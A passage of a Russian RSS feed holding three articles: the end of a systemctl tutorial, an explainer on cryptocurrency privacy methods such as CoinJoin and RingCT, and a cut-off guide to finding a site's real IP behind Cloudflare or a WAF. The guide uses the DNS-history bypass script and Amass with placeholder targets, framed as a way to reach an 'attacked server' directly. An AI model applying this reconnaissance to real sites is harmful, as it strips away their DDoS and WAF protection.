  <p>Для просмотра дерева зависимостей юнита (другие юниты, активируемые systemd при запуске юнита), выполните команду:</p>
  <pre>systemctl list-dependencies nginx.service
</pre>
  <figure class="m_original">
    <img src="https://itproffi.ru/wp-content/uploads/2019/01/systemctl6-1.jpg" width="710" />
  </figure>
  <p>Вывод списка зависимых юнитов, которые будут рекурсивно раскрыты. Для полного рекурсивного раскрытия всех зависимых юнитов (второй и большие уровни зависимости), воспользуйтесь опцией —all:</p>
  <pre>systemctl list-dependencies --all nginx.service
</pre>
  <figure class="m_original">
    <img src="https://itproffi.ru/wp-content/uploads/2019/01/systemctl7.jpg" width="803" />
  </figure>
  <p>Для просмотра низкоуровневых данных о настройках юнита в системе используется опция show. В этом случае выводится значение каждого параметра, управляемого <em>systemd</em>:</p>
  <pre>systemctl show nginx.service
</pre>
  <figure class="m_original">
    <img src="https://itproffi.ru/wp-content/uploads/2019/01/systemctl8.jpg" width="1625" />
  </figure>
  <h3>Изменение файлов юнитов</h3>
  <p>Если требуется изменить файл юнита, это можно сделать непосредственно командой <em>systemctl</em>, чтобы не искать его на диске.</p>
  <p>Для создания сниппета файла юнита (блок, который может использоваться для дополнения или замены параметров файла юнита по умолчанию) нужно воспользоваться опцией edit:</p>
  <pre>sudo systemctl edit nginx.service
</pre>
  <p>Если нужно изменить все содержимое файла, а не создавать сниппет, воспользуйтесь флагом —full:</p>
  <pre>sudo systemctl edit --full nginx.service
</pre>
  <p>После изменения файла юнита нужно перезагрузить сам процесс systemd для принятия изменений:</p>
  <pre>sudo systemctl daemon-reload
</pre>
  <h3>Использование целей</h3>
  <p>Одна из функций системы инициализации — перевод сервера в различные состояния. Обычно они называются уровнями запуска или уровнями выполнения. В заданный момент времени система может находиться только на одном уровне выполнения. В таблице предоставлены доступные уровни запуска</p>
  <p>ЦельУровеньpoweroff.target0rescue.target1multi-user.target2multi-user.target3multi-user.target4graphical.target5reboot.target6</p>
  <p>В <em>systemd</em> вместо этого применяются цели. Цель — это точка синхронизации, которой сервер может воспользоваться для перехода в определенное состояние. К цели можно привязать службы и другие юниты, одновременно может быть активно несколько целей. Для просмотра полного списка целей в системе нужно выполнить команду:</p>
  <pre>systemctl list-units --type=target
</pre>
  <figure class="m_original">
    <img src="https://itproffi.ru/wp-content/uploads/2019/01/systemctl11.jpg" width="703" />
  </figure>
  <p>Для просмотра цели по умолчанию, которой <em>systemd</em> стремится достичь при загрузке (которая, в свою очередь, запускает все файлы юнитов, составляющие дерево зависимости этой цели), выполните команду:</p>
  <pre>systemctl get-default
</pre>
  <figure class="m_original">
    <img src="https://itproffi.ru/wp-content/uploads/2019/01/systemctl13.jpg" width="671" />
  </figure>
  <p>multi-user.target соответствует третьему уровню запуска, проверить это можно командой</p>
  <pre>runlevel
</pre>
  <figure class="m_original">
    <img src="https://itproffi.ru/wp-content/uploads/2019/01/systemctl14.jpg" width="501" />
  </figure>
  <p>При помощи опции set-default изменить цель по умолчанию, которая будет использоваться при загрузке:</p>
  <pre>systemctl set-default graphical.target
</pre>
  <p>Для просмотра привязанных к цели юнитов можно выполнить следующую команду:</p>
  <pre>systemctl list-dependencies multi-user.target
</pre>
  <figure class="m_original">
    <img src="https://itproffi.ru/wp-content/uploads/2019/01/systemctl10.jpg" width="630" />
  </figure>
  <p>Изменять состояние системы для перехода между можно при помощи isolate (изолировать). Она останавливает все юниты, не привязанные к указанной цели. Убедитесь что изолируемая вами цель не останавливает важные службы. Например команда</p>
  <pre>systemctl isolate reboot.target
</pre>
  <p>Перезагрузит вашу систему.</p>
  <h3>Выключение и перезагрузка сервера</h3>
  <p>Для некоторых важных состояний системы есть ярлыки. Например, такой командой можно выключить сервер:</p>
  <pre>sudo systemctl poweroff
</pre>
  <p>Перезагрузка системы:</p>
  <pre>sudo systemctl reboot
</pre>
  <p>Загрузка в режиме восстановления:</p>
  <pre>sudo systemctl rescue
</pre>
  <p>В большинстве операционных систем для этих операций есть стандартные алиасы, так что можно просто ввести</p>
  <pre>sudo poweroff
</pre>
  <p>или</p>
  <pre>sudo reboot
</pre>
  <p>без <em>systemctl</em>, но их может и не быть.</p>
  <h3>Заключение</h3>
  <p>Мы рассмотрели основы управления юнитами и службами при помощи команды <em>systemctl</em>, а также познакомились с концепцией целей. Для более подробной информации можно обратиться к соответствующим <a href="https://itproffi.ru/interaktivnye-rukovodstva-v-linux-komanda-man/" target="_blank">man-страницам</a></p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@hata_hack/VS6Jd_dhF</guid><link>https://teletype.in/@hata_hack/VS6Jd_dhF?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=hata_hack</link><comments>https://teletype.in/@hata_hack/VS6Jd_dhF?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=hata_hack#comments</comments><dc:creator>hata_hack</dc:creator><title>Конфиденциальность в криптовалютах</title><pubDate>Thu, 27 Aug 2020 08:00:12 GMT</pubDate><media:content medium="image" url="https://teletype.in/files/db/28/db28ed98-0aa2-42c5-ab5b-085b7d70fea9.jpeg"></media:content><description><![CDATA[<img src="https://habrastorage.org/getpro/habr/post_images/c9a/6d3/f56/c9a6d3f56b5287701d50f279be62980c.png"></img>В рамках данной статьи мы постарались дать ответ на вопрос о том, что такое конфиденциальность и как ее можно достичь в Биткоине и других цифровых валютах. Кроме того, здесь вы узнаете о конкретных механизмах достижения конфиденциальности, а также о том, как они применяются на практике. Тема будет интересной тем, кто непосредственно работает с криптовалютами, а также любителям протоколов, которые повышают уровень конфиденциальности пользователей.]]></description><content:encoded><![CDATA[
  <p>В рамках данной статьи мы постарались дать ответ на вопрос о том, что такое конфиденциальность и как ее можно достичь в Биткоине и других цифровых валютах. Кроме того, здесь вы узнаете о конкретных механизмах достижения конфиденциальности, а также о том, как они применяются на практике. Тема будет интересной тем, кто непосредственно работает с криптовалютами, а также любителям протоколов, которые повышают уровень конфиденциальности пользователей.</p>
  <hr />
  <h3>Определимся с терминами</h3>
  <p>Тема конфиденциальности (privacy) и способов ее обеспечения достаточно объемна. Начать ее изучение лучше всего с понимания базовых определений.</p>
  <p>Понятие privacy включает в себя две основные составляющие: untraceability и anonymity. Untraceability, или непрослеживаемость, подразумевает невозможность отнести группу действий к некоторому пользователю в сети. Anonymity, или анонимность, связана с невозможностью достоверно установить личность пользователя в этой сети.</p>
  <hr />
  <h3>Конфиденциальность в Биткоине по умолчанию</h3>
  <p>В Биткоине присутствует свойство anonymity, но его очень легко потерять на практике. Не достигается в полной мере и свойство untraceability. Мы можем проанализировать граф транзакций и сделать заключение об их причастности к определенным анонимным кошелькам. Если хотя бы один адрес был скомпрометирован в контексте анонимности, то можно установить и причастность к определенным личностям. Самая простая реализация биткоин-кошелька способна обеспечить только минимальный уровень конфиденциальности.</p>
  <p>Допустим, для каждого входящего платежа или сдачи пользователь создает новый адрес. Аудитор, анализирующий граф транзакций, в этом случае уже не может достоверно связать конкретные факты, которые касаются действий пользователей и распределения валюты между ними. Но даже в такой ситуации конфиденциальность не так надежна, как может показаться.</p>
  <p>Обычно в сети Биткоин ваша приватность зависит от контрагентов. Тот, кто принимает платеж, знает историю происхождения монет, а тот, кто отправляет монеты, знает, куда он их передает. Более того, есть ряд метаданных, которые могут оказаться доступными посторонним: характер сделки, данные о кошельке, данные о нахождении пользователя и т. д.</p>
  <p>Какие же данные о транзакции нужно скрывать прежде всего, чтобы обеспечить максимальный уровень конфиденциальности? Сюда относятся данные о происхождении монет, которые касаются свойства взаимозаменяемости, или fungibility. Оно очень важно для любых денег и ценностей. На уровне протокола Биткоина это свойство обеспечивается (все монеты одинаковые и правила их обработки общие для всех), но на практике fungibility легко нарушить. Например, некоторые мерчанты могут анализировать историю происхождения принимаемых монет и отклонять платежи, если она вызывает у них сомнения.</p>
  <p>Следующее, что имеет смысл скрывать, это сумма переводов, адресов отправителя и получателя в теле транзакции. Важно также скрыть сетевые адреса пользователей, что обычно достигается при помощи даркнетов, где используются такие протоколы, как Freenet, TOR и I2P. Как же скрыть суммы, историю и адреса?</p>
  <hr />
  <h3>CoinJoin</h3>
  <p>Самый простой метод для запутывания графа транзакций называется CoinJoin. С него мы и начнем. Его суть состоит в создании совместной транзакции, вследствие чего происхождение отправляемых монет становится неоднозначным. Формируется группа из пользователей, которые создают общую транзакцию, в рамках которой одновременно совершается несколько платежей. То есть пользователям не нужно создавать отдельные транзакции.</p>
  <p>Впервые такую идею предложил Gregory Maxwell в 2013 году на популярном форуме BitcoinTalk. С тех пор было предложено и разработано много модификаций данного метода. Каждая из них улучшала определенные свойства платежей. Давайте поговорим о том, как CoinJoin работает в чистом виде, а после рассмотрим несколько самых интересных его модификаций.</p>
  <hr />
  <h3>Как работает CoinJoin</h3>
  <p>Представьте группу из трех пользователей, в которой каждый хочет приобрести товар в интернет-магазине (при этом для каждого из них магазин свой).</p>
  <figure class="m_column">
    <img src="https://habrastorage.org/getpro/habr/post_images/c9a/6d3/f56/c9a6d3f56b5287701d50f279be62980c.png" width="3342" />
  </figure>
  <p>Они создают одну транзакцию на три входа, по одному от каждого пользователя, три выхода, по одному на каждый интернет-магазин. Кроме того, создается еще три выхода для сдачи. Далее, все выходы перемешиваются между собой случайным образом. Каждый пользователь перепроверяет полученную транзакцию и подписывает соответствующий ему вход. В случае успеха транзакция считается правильной, распространяется в сеть и получает подтверждение.</p>
  <hr />
  <h3>Отличия CoinJoin от обычной транзакции</h3>
  <p>Схема ниже показывает разницу между графами обычных транзакций и CoinJoin транзакции.</p>
  <figure class="m_column">
    <img src="https://habrastorage.org/getpro/habr/post_images/27a/2c6/82f/27a2c682fda5857c743182b093a0756e.png" width="3342" />
  </figure>
  <p>Выше находится граф, где каждая транзакция имеет один или два выхода, а снизу транзакции уже имеют по три выхода. Нижний граф более запутан и сложнее поддается анализу. Когда в биткоин-кошельке CoinJoin применяется на практике, формируется многочисленная группа пользователей. Тогда транзакции могут иметь десятки входов и выходов (иногда больше). Изображенный на плоскости, граф таких транзакций получится очень запутанным. Монета, которая прошла цепочку таких транзакций, имеет тысячи возможных вариантов происхождения. Сложно отыскать среди всех вариантов настоящий.</p>
  <hr />
  <h3>Chaumian CoinJoin</h3>
  <p>Мы подошли к модификации CoinJoin, которая называется Chaumian CoinJoin. И предложил её тот же Gregory Maxwell. Здесь задействуется централизованный оператор и используется слепая подпись. Оператор нужен, чтобы выполнить перемешивание входов и выходов, после чего составить конечную транзакцию. Но оператор при этом не может украсть монеты или нарушить конфиденциальность перемешивания благодаря слепой подписи.</p>
  <p>Пользователь предварительно ослепляет данные до их передачи оператору. Когда оператор подписывает эти данные, он не видит фактическое содержимое. Подписанные данные возвращаются пользователю, после чего он убирает ослепление и все выглядит, как обычная электронная подпись.</p>
  <p>Как происходит взаимодействие между пользователем и оператором при формировании общей транзакции? Каждый пользователь заранее подготавливает вход, где тратятся принадлежащие ему монеты, адрес для получения сдачи, а также ослепленный адрес для отправки платежа, после чего объединяет эти данные в одну последовательность и передает оператору.</p>
  <p>Оператор проверяет вход и сумму платежа, подписывает выходной адрес и возвращает подпись пользователю. При этом оператор не видит адрес, на который пользователь хочет отправить платеж, поскольку он ослеплен. Далее, пользователь убирает ослепление с выходного адреса, анонимно переподключается к оператору и передает ему подписанный выходной адрес. Оператор в свою очередь проверяет, что он действительно подписывал этот адрес своим ключом и соответствующий вход у него уже есть, но при этом он не может знать, какой вход соответствует какому выходу. После того, как все пользователи выполнили такие действия, они снова анонимно переподключаются к оператору и предоставляют подписи, которые подтверждают владение монетами на входе общей транзакции. Готовую транзакцию можно распространять в сеть для подтверждения.</p>
  <p>В таком случае ни пользователи, ни сам оператор не могут деанонимизировать монеты на выходных адресах. А формирование транзакции при нормальных условиях занимает не больше одной минуты. Взаимодействие пользователей должно проводится через анонимные сети передачи данных, в качестве которых можно использовать TOR, I2P или Bitmessage.</p>
  <p>Среди пользователей могут быть недобросовестные участники, цель которых — нарушить процесс создания общей транзакции любыми способами. Существует целый список возможных сценариев поведения пользователей, в том числе и мошеннический. Разработан целый ряд механизмов защиты для противостояния неблагоприятным сценариям, которые позволяют честным пользователям гарантированно сформировать конечную транзакцию. Механизмы защиты используют таймауты, отслеживание непотраченных выходов и т. д. Подробнее со всеми сценариями и механизмами защиты вы можете ознакомиться отдельно. А сейчас рассмотрим следующую модификацию CoinJoin, которая называется CoinShuffle.</p>
  <hr />
  <h3>CoinShuffle</h3>
  <p>Модификацию CoinShuffle предложили в 2014 году. Здесь уже нет центрального оператора и это стало преимуществом. Пользователи самостоятельно формируют общую транзакцию, общаясь между собой. При этом они все равно не могут нарушить конфиденциальность перемешивания выходных адресов. Еще одно преимущество этой методики состоит в том, что пользователям не обязательно использовать дополнительные сети для анонимизации трафика, так как все необходимые свойства будут достигнуты при использовании одного Р2Р-протокола взаимодействия участников.</p>
  <p>Здесь применяется направленное шифрование, где задействуется пара ключей (открытый и личный). Сообщение шифруется с помощью открытого ключа, а расшифровать его может только владелец личного ключа. Для коммуникации между участниками используется протокол DiceMix, также предусмотрено противостояние нарушителям.</p>
  <hr />
  <h3>Наглядно о CoinShuffle</h3>
  <p>Давайте разберемся, как же работает CoinShuffle.</p>
  <figure class="m_column">
    <img src="https://habrastorage.org/getpro/habr/post_images/764/602/e4d/764602e4de8af5ffa9b632e749f2b74e.png" width="3342" />
  </figure>
  <p>Представьте небольшую группу пользователей: хитрая Алиса, мудрый Боб, бородатый Чарли и оранжевый Дэйв. У каждого из них есть одна непотраченная монета в блокчейне Биткоина на адресах A, B, C и D соответственно. Каждый хочет потратить монету и скрыть при этом историю ее происхождения. С этой целью каждый участник группы узнает адрес, на который должна быть отправлена монета A, B, C или D соответственно, но не разглашает этот адрес остальным участникам.</p>
  <p>Далее, каждый генерирует новую пару ключей для направленного шифрования, после чего участники группы обмениваются открытыми для шифрования ключами между собой, причем новый открытый ключ подписывается личным ключом, который соответствует адресу с непотраченной монетой. Таким же образом будут подписываться все сообщения участников при последующем взаимодействии. Это был первый этап.</p>
  <figure class="m_column">
    <img src="https://habrastorage.org/getpro/habr/post_images/c1a/f45/c93/c1af45c93fbf8cfe51a5e751afe30860.png" width="3342" />
  </figure>
  <p>Участники перемешиваются и образуют очередь. Алиса будет первой, потому что она хитрая, Боб второй, потому что он мудрый, и т. д. Теперь Алиса берет А’ и шифрует направленно на Дэйва, используя открытый ключ Дейва соответственно. Получившийся шифротекст Алиса снова шифрует, причем направленно на Чарли. Этот шифротекст снова шифруется, но уже направленно на Боба. Результат шифрования Алиса передает Бобу. Боб расшифровывает своим личным ключом полученное сообщение. Затем берет B’ и шифрует направленно на Дейва, потом на Чарли и добавляет в список. Этот список он перемешивает случайным образом и передает Чарли. Чарли в свою очередь расшифровывает элементы списка своим личным ключом, добавляет C’, зашифрованный направленно на Дейва, в список и перемешивает все элементы списка случайным образом. Список передается Дейву, который его расшифровывает, получает открытые данные адресов для отправки монет, добавляет адрес D’, перемешивает случайным образом и на основании этих адресов, известных входов транзакции и сумм формирует общую транзакцию.</p>
  <figure class="m_column">
    <img src="https://habrastorage.org/getpro/habr/post_images/219/8f6/a86/2198f6a8686b8c620eac64e6f62db9a0.png" width="3342" />
  </figure>
  <p>Дейв распространяет заготовку транзакции остальным участникам группы. Далее, каждый пристально проверяет, есть ли в выходах транзакции нужный ему адрес и совпадает ли сумма. Если все хорошо, то участник подписывает транзакцию, подтверждая владение монетами своего входа. Участники обмениваются подписями и если транзакция набирает все необходимые подписи, то может быть распространена в сеть для подтверждения.</p>
  <p>Если кто-то из участников начинает отклоняться от основного сценария взаимодействия, то остальные могут совместно проанализировать историю взаимодействия и вывести нарушителей из группы, чтобы повторить все без них. Это важная особенность.</p>
  <p>Отметим, что готовые реализации CoinShuffle уже есть. И на практике они эффективно работают даже на группах из нескольких десятков пользователей. В настоящий момент ожидается интеграция этого протокола в некоторые биткоин-кошельки, в том числе и в мобильные.</p>
  <hr />
  <h3>Каковы же недостатки у метода CoinJoin?</h3>
  <p>Очевидно, что существует большая сложность off-chain взаимодействия для формирования транзакции, т. е. необходимо организовать формирование групп и взаимодействие участников между собой. Но более весомый недостаток состоит в том, что CoinJoin в чистом виде не скрывает суммы переводов. Как результат, он уязвим к CoinJoin Sudoku analysis, который основан на сопоставлении сумм на выходах транзакций и позволяет распутать историю происхождения монет после многократного ее запутывания. Да, с этой проблемой можно бороться, например, использользовать для выходных значений транзакций только определенные суммы (0.1 ВТС, 1 ВТС, 10 ВТС и т. п.), но это создает дополнительные сложности и ограничения. Поэтому рассмотрим совершенно другой метод, который решает проблему открытых сумм перевода, — Confidential Transactions.</p>
  <hr />
  <h3>Confidential Transactions</h3>
  <p>Особенность метода Confidential Transactions (CT) заключается в том, что он полностью скрывает фактические суммы на входах и выходах транзакции от третьих лиц. Каждый может проверить, что сумма всех выходов не превышает сумму всех входов, чего уже достаточно для валидации этой транзакции.</p>
  <p>Это стало возможным благодаря использованию zero-knowledge proof — это криптографическое доказательство знания некоторого секрета, но без разглашения последнего. Для доказательства того, что сумма выходов не превышает сумму входов, используется Petersen Commitment, который базируется на преобразованиях в группе точек на эллиптической кривой. С целью борьбы с неконтролируемой эмиссией монет в этой схеме обязательно применяется доказательство использования допустимых сумм на выходе транзакции. Чтобы проверить, что были использованы неотрицательные суммы, которые не превышают порядок базовой точки, применяются так называемые Range Proofs.</p>
  <p>И все было бы хорошо, но создание этих самых Range Proofs весьма затратно с точки зрения вычислительных ресурсов. Кроме того, они имеют очень большой объем. Теоретически интегрировать Confidential Transactions в протокол биткоина можно, но никто особо не спешит это делать из-за их большого объема. Тем не менее уже есть работающие системы учета, где Confidential Transactions успешно применяются.</p>
  <hr />
  <h3>Ring Confidential Transactions</h3>
  <p>Следующая методика называется Ring Confidential Transactions. Для запутывания истории происхождения монет здесь используются кольцевые подписи. Оправитель во входе своей транзакции ссылается не на один конкретный выход (UTXO), а сразу на несколько. Далее, с помощью кольцевой подписи он доказывает, что ему принадлежат монеты одного из нескольких выходов, но не разглашается, какого конкретно. Из этого следует, что невозможно однозначно отследить историю происхождения монет.</p>
  <p>Применение кольцевых подписей таким образом было впервые предложено в протоколе CryptoNote, на базе которого работают несколько криптовалют. Ring Confidential Transactions используют CT. Они позволяют создавать транзакции со множеством входов и выходов, где невозможно однозначно отследить происхождение каждого входа, суммы переводов скрыты, а взаимодействие с другими пользователями для создания транзакции не требуется.</p>
  <hr />
  <h3>Stealth Addresses</h3>
  <p>Этот подход представляет собой методику скрытого расчета адресов, на которые будут отправляться монеты. Впервые эту идею описал Peter Todd. В качестве идентификаторов пользователей используются открытые ключи: если вы хотите принимать платежи, то вам нужно огласить свой публичный ключ.</p>
  <p>Отправитель использует свою пару ключей и ваш открытый ключ, чтобы рассчитать новый одноразовый открытый ключ, который уже будет указан в транзакции в качестве адреса. Получается, что адрес, на который отправляются монеты, могут знать только отправитель и получатель. Для стороннего наблюдателя связь между идентификатором пользователя и адресом на выходе транзакции установить невозможно.</p>
  <hr />
  <h3>Применение на практике</h3>
  <p>Где же данные методы применяются на практике?</p>
  <figure class="m_column">
    <img src="https://habrastorage.org/getpro/habr/post_images/941/108/054/9411080540f9a30e693cb670d6ae4c53.png" width="1920" />
  </figure>
  <p>Команда Bitshares одна из первых реализовала CT в связке со Stealth Addresses, причем не только для базовой валюты, но и для токенов, которые можно выпускать на платформе. Криптовалюта Monero поддерживает кольцевые подписи и Stealth Addresses для обеспечения высокого уровня конфиденциальности. В январе 2017 года команда реализовала RingCT, а с обновлением в сентябре 2017 года использование RingCT стало строго обязательным. Следует отметить и протокол Mimblewimble, который использует модифицированный вариант CT, который сейчас находится на стадии активной разработки, но мы о нем поговорим позже.</p>
  <p>Существует такой проект ZeroLink, который представляет собой фреймворк для создания конфиденциальных кошельков на основе методики Chaumian CoinJoin. Примечательно, что он может работать в Биткоине, не требуя при этом никаких изменений в самом протоколе.</p>
  <hr />
  <h3>Перейдем к часто задаваемым вопросам</h3>
  <p><em>— Существует ли возможность использовать Stealth Addresses в биткоине?</em></p>
  <p>Да, вы уже сейчас можете их использовать, обновления протокола для этого не требуется. Но для более широкой адаптации этой функциональности необходимо строго специфицировать порядок вычислений и форматы данных, чтобы все кошельки могли работать друг с другом и, соответственно, добавить эту функцию в сами кошельки. Для введения этой спецификации Peter Todd уже создал отдельный BIP, но он еще на стадии рассмотрения.</p>
  <p><em>— Эффективно ли использовать CoinJoin в чистом виде для биткоинов?</em></p>
  <p>Нет, в чистом виде это малоэффективно, потому что такие транзакции поддаются простому анализу по суммам переводов. Как вариант, можно использовать одинаковые суммы для всех участников, при этом нужно избегать доверенных миксеров, которые могут либо украсть монеты, либо нарушить конфиденциальность.</p>
  <p><em>— Можно ли применять рассмотренные выше методики для обеспечения конфиденциальности в таких цифровых валютах, как Ethereum, Ripple и Stellar?</em></p>
  <p>Нет, это не так. Ethereum, Ripple и Stellar используют совершенно другую модель транзакций и другой способ учета монет, к которым нельзя применить такие методики достижения конфиденциальности. Вы, конечно, можете попытаться искусственно интегрировать Stealth Addresses или Confidential Transactions, но это будет крайне малоэффективно с точки зрения производительности валюты. Причина состоит в том, что в Биткоине учет ведется на основании непотраченных выходов (то есть UTXO), а эти валюты используют балансы и аккаунты.</p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@hata_hack/B92coKIQH</guid><link>https://teletype.in/@hata_hack/B92coKIQH?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=hata_hack</link><comments>https://teletype.in/@hata_hack/B92coKIQH?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=hata_hack#comments</comments><dc:creator>hata_hack</dc:creator><title>Как узнать реальный IP сайта скрытый за DDoS защитой</title><pubDate>Thu, 27 Aug 2020 07:44:57 GMT</pubDate><media:content medium="image" url="https://teletype.in/files/56/b5/56b56f6d-5e97-496e-8d31-2b9f558f17a5.png"></media:content><description><![CDATA[<img src="https://i1.wp.com/cryptoworld.su/wp-content/uploads/2020/06/1.jpg?resize=858%2C522&amp;ssl=1"></img>Существуют разные сервисы, которые скрывают адрес сайта за другим IP — в целях защиты от DoS, DDoS или прочих атак. Это могут быть как всем известные облачные сервисы вроде Cloudflare, так и файрволы веб-приложений (WAF) и другие защитные решения. Задача их обхода сводится к тому, чтобы вызнать реальный IP, и для этого существуют готовые утилиты. Давай посмотрим, как пользоваться ими на практике.]]></description><content:encoded><![CDATA[
  <p>Существуют разные сервисы, которые скрывают адрес сайта за другим IP — в целях защиты от DoS, DDoS или прочих атак. Это могут быть как всем известные облачные сервисы вроде Cloudflare, так и файрволы веб-приложений (WAF) и другие защитные решения. Задача их обхода сводится к тому, чтобы вызнать реальный IP, и для этого существуют готовые утилиты. Давай посмотрим, как пользоваться ими на практике.</p>
  <p>Для начала чуть подробнее расскажу о том, что такое WAF и как он работает. Например, в составе всем знакомого веб-сервера Apache есть модуль mod_security, который способен выполнять функции файрвола веб-приложений и помочь защитить твой сервис от какой-нибудь тривиальной DoS-атаки. Одна из таких атак — HTTP(S) GET-флуд, когда серверу посылают бесчисленное множество запросов на получение информации. Сервер неспособен обработать столько запросов за очень короткий промежуток и попросту падает.</p>
  <p>Подобную функцию может предоставлять и какой-то облачный провайдер — для простоты разные сервисы такого типа я дальше буду называть просто WAF. Принцип их работы можно описать следующим образом.</p>
  <ol>
    <li>Веб-сервер, который нужно защитить, работает в обычном режиме без фильтрации опасных запросов, а WAF-сервис настроен на отдельном сервере компании, предоставляющей подобные услуги.</li>
    <li>В некой DNS-записи в качестве IP нужного сайта указывается не его настоящий адрес, а IP-адрес сервера WAF.</li>
    <li>После такой настройки все запросы к доменному имени сайта будут направляться не на сам сайт, а на WAF-сервер.</li>
    <li>Этот сервер принимает запрос, обрабатывает его и, если запрос удовлетворяет настроенным правилам, отсылает его на защищаемый сервер. WAF получает от этого сервера запрашиваемую информацию (веб-страницу, файл) и перенаправляет ее клиенту (пользователю).</li>
  </ol>
  <h3>Как обхитрить систему</h3>
  <p>Так как современные WAF блокируют множество вредоносных запросов, не получится использовать утилиты вроде sqlmap или WPScan. Также невозможны атаки типа DoS или DDoS.</p>
  <p>Поэтому у нас есть два варианта действий.</p>
  <ol>
    <li>Сконструировать запрос таким образом, чтобы обойти правила, прописанные в WAF (см. статью «<a href="https://cryptoworld.su/kak-iskat-uyazvimosti-v-firewall-waf/" target="_blank">Как искать байпасы в современных Web Application Firewalls</a>»).</li>
    <li>Отправить запрос напрямую к веб-серверу, минуя проверку WAF.</li>
  </ol>
  <p>Дальше мы сконцентрируемся на втором пункте. Для его реализации нам нужно знать настоящий IP-адрес сервера и быть уверенными, что этот сервер способен принимать запросы напрямую из сети от кого угодно. Прямой IP-адрес сервера часто называют словом bypass. Иногда прямой доступ к нему специально сохраняют, чтобы сервер мог продолжить работу в случае неполадок на стороне WAF-сервисов.</p>
  <p>Для этой цели мы будем использовать скрипт с длинным, но говорящим названием: Bypass firewalls by abusing DNS history.</p>
  <p>Эта утилита пытается узнать настоящий IP-адрес нужного нам сервера сразу двумя методами.</p>
  <ol>
    <li>Анализ истории DNS-записей.</li>
    <li>Поиск поддоменов и последующий анализ их IP-адресов.</li>
  </ol>
  <p>Ко всем найденным IP-адресам скрипт делает запросы для проверки.</p>
  <h3>К практике</h3>
  <p>Скрипт находится в открытом доступе на <a href="https://github.com/vincentcox/bypass-firewalls-by-DNS-history" target="_blank">GitHub</a>. Я запускал его в Kali Linux, но он может работать и в других дистрибутивах.</p>
  <p>Команды для установки на Kali выглядят так:</p>
  <pre>$ sudo apt install jq
$ git clone https://github.com/vincentcox/bypass-firewalls-by-DNS-history
</pre>
  <p>Команда для установки в дистрибутиве BlackArch:</p>
  <pre>$ sudo pacman -S bypass-firewall-dns-history jq
</pre>
  <p>Возвращаемся в Kali. Первой строчкой мы ставим необходимый модуль для работы скрипта, а второй скачиваем скрипт с GitHub. Чтобы получить справку по использованию тулзы, достаточно перейти в ее директорию и выполнить следующую команду:</p>
  <pre>$ bash bypass-firewalls-by-DNS-history.sh --help
</pre>
  <p>Как видишь, разработчик скрипта предусмотрел несколько параметров:</p>
  <ul>
    <li><code>-d</code> — обязательный ключ для использования скрипта. С его помощью мы указываем доменное имя сайта, для которого хотим найти bypass;</li>
    <li><code>-a</code> — с этим параметром найденные IP будут проверены не только для основного домена, но и для поддоменов;</li>
    <li><code>-l</code> — этот параметр позволяет подгрузить в скрипт твой список поддоменов, чтобы выполнить более детальную и точную проверку;</li>
    <li><code>-o</code> — данный параметр позволяет сохранить результат работы скрипта в файл, путь к которому указывается после параметра.</li>
  </ul>
  <p>А теперь запустим скрипт:</p>
  <pre>$ bash bypass-firewalls-by-DNS-history.sh -d &lt;Your_target&gt;
</pre>
  <p>Для примера я нашел один сайт, который уязвим к атаке такого вида. Вот как выглядит вывод скрипта для этого сайта.</p>
  <figure class="m_column">
    <img src="https://i1.wp.com/cryptoworld.su/wp-content/uploads/2020/06/1.jpg?resize=858%2C522&ssl=1" width="858" />
    <figcaption>Результат работы скрипта</figcaption>
  </figure>
  <p>В колонке IP будут поочередно записаны IP-адреса, по которым можно напрямую обратиться к серверу. Во второй колонке указана вероятность того, что это верный IP, выраженная в процентах. В колонке Organisation — название компании, которой принадлежит данный IP.</p>
  <p>Возьмем другой пример и расширим зону поиска: добавим сопоставление IP с поддоменами:</p>
  <pre>$ bash bypass-firewalls-by-DNS-history.sh -d &lt;Your_target&gt; -a
</pre>
  <figure class="m_column">
    <img src="https://i1.wp.com/cryptoworld.su/wp-content/uploads/2020/06/2.jpg?resize=874%2C546&ssl=1" width="874" />
    <figcaption>Результат расширенного поиска</figcaption>
  </figure>
  <p>Здесь, помимо всего прочего, появляется еще одна колонка — Domain, в которой перечислены поддомены, соответствующие найденным IP-адресам.</p>
  <p>Чтобы потом не потерять результат работы, его обычно сохраняют в файл. Что ж, используем параметр <code>-o</code> и пропишем путь для сохранения лога в домашнюю папку пользователя.</p>
  <pre>$ bash bypass-firewalls-by-DNS-history.sh -d &lt;Your_target&gt; -a -o /home/kali/&lt;output.txt&gt;
</pre>
  <p>Можно указывать не весь путь, а только название файла, в который будет записан результат. Файл сохранится в папку со скриптом.</p>
  <p>Как ты знаешь, не все взламывается в один клик. Иногда программам тоже нужна помощь — в нашем случае мы можем облегчить тулзе задачу, составив объемный список поддоменов. Этот список мы заполним с помощью скрипта Amass, который прекрасно умеет это делать. Запускается Amass вот такой командой:</p>
  <pre>$ Amass enum -d &lt;Your_target&gt; -o &lt;subdomains.txt&gt;
</pre>
  <p>С помощью параметра <code>-d</code> указываем свою цель, с помощью <code>-o</code> — файл для сохранения результата работы.</p>
  <figure class="m_column">
    <img src="https://i0.wp.com/cryptoworld.su/wp-content/uploads/2020/06/3.jpg?resize=870%2C498&ssl=1" width="870" />
    <figcaption>Результат работы Amass</figcaption>
  </figure>
  <p>Возвращаемся к WAF Bypass. Теперь мы будем использовать список найденных поддоменов для поиска настоящего IP-адреса атакуемого сервера:</p>
  <pre>$ bash bypass-firewalls-by-DNS-history.sh -d &lt;Your_target&gt; -l &lt;subdomains.txt&gt;
</pre>
  <figure class="m_column">
    <img src="https://i0.wp.com/cryptoworld.su/wp-content/uploads/2020/06/4.jpg?resize=856%2C492&ssl=1" width="856" />
    <figcaption>Результат работы WAF Bypass с помощью списка поддоменов</figcaption>
  </figure>
  <p>Как видим, найдены два наиболее вероятных bypass-ip.</p>
  <h3>Пробуем навыки в деле</h3>
  <p>Чтобы развеять у тебя сомнения в работоспособности этого метода, я предлагаю провести небольшое исследование. Мы попробуем пробить с помощью данной утилиты несколько сайтов и составим небольшую статистику.</p>
  <p>Хочу уточнить: проверять мы будем только серверы, которые защищены WAF. Чтобы в этом убедиться, используем встроенную в Kali утилиту dig:</p>
